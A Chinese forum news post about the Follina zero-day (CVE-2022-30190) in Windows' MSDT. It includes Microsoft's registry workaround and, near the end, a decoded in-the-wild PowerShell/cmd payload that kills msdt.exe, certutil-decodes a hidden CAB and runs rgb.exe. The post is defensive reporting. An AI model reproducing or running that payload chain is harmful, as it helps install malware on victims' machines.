1. XenForo 1.5.14 中文版——支持中文搜索!现已发布!查看详情
  2. Xenforo 爱好者讨论群:215909318 XenForo专区

科技 专家发现高危代码执行零日漏洞 所有支持Windows版本均受影响

本帖由 漂亮的石头2022-06-01 发布。版面名称:新闻聚焦

  1. 漂亮的石头

    漂亮的石头 版主 管理成员

    注册:
    2012-02-10
    帖子:
    488,189
    赞:
    47
    安全专家近日发现了高危的代码执行零日漏洞,目前所有支持的 Windows 系统均受影响。已经有相关证据表明至少在 7 周前就有黑客利用该漏洞,在不触发 Windows Defender 以及其他终端保护产品的情况下,在受害者设备上安装恶意程序。

    [​IMG]

    Shadow Chaser Group 的研究人员在 Twitter 上表示,这个存在于 Microsoft Support Diagnostic Tool 中的漏洞已经于 4 月 12 日报告给微软,并已经证明该漏洞已经被黑客利用进行攻击。​

    不过给该研究人员的回复中,微软安全响应中心团队并未将报告的行为视为安全漏洞,因为据推测,MSDT 诊断工具在执行有效负载之前需要密码。​

    不过本周一,微软改变了口风,将该漏洞标识为 CVE-2022-30190,并将其描述为“关键”(critical)漏洞。​

    在公告中写道:“当从 Word 等调用应用程序使用 URL 协议调用 MSDT 时,存在远程代码执行漏洞。成功利用此漏洞的攻击者可以使用调用应用程序的权限运行任意代码。然后攻击者可以安装程序、查看、更改或删除数据,或者在用户权限允许的上下文中创建新帐户”。​

    在本文发表时,微软尚未发布补丁。相反,它建议客户通过以下方式禁用 MSDT URL 协议:​


    1. 以管理员身份运行命令提示符。​

    2. 要备份注册表项,请执行命令“reg export HKEY_CLASSES_ROOTms-msdt filename”​

    3. 执行命令“reg delete HKEY_CLASSES_ROOTms-msdt /f”​

    虽然最初被微软遗漏了,但当研究人员发现周五上传到 VirusTotal 的 Word 文档利用了以前未知的攻击媒介时,该漏洞再次被发现。​

    根据研究员 Kevin Beaumont 的分析,该文档使用 Word 从远程 Web 服务器检索 HTML 文件。然后,该文档使用 MSProtocol URI 方案来加载和执行 PowerShell 命令。​

    虽然在理论上这不太可能实现,但事实上确实是可以的。当文档中的命令被解码时,它们会转换为:​


    $cmd ="c:Windowssystem32cmd.exe";​

    Start-Process $cmd -windowstyle hidden -ArgumentList"/c taskkill /f /im msdt.exe";​

    Start-Process $cmd -windowstyle hidden -ArgumentList"/c cd C:userspublic&&for /r​

    %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";​

    根据 Huntress 的解释,该脚本实现的操作为​


    在隐藏窗口运行以下操作​

    1. 如果 msdt.exe 正在运行,则终止它​

    2. 循环遍历 RAR 文件中的文件,查找编码 CAB 文件的 Base64 字符串​

    3. 将此 Base64 编码的 CAB 文件存储为 1.t​

    4. 解码Base64编码的CAB文件保存为1.c​

    5. 将1.c CAB文件展开到当前目录,最后:​

    6. 执行rgb.exe(大概压缩在1.c CAB文件里面)​
     
正在加载...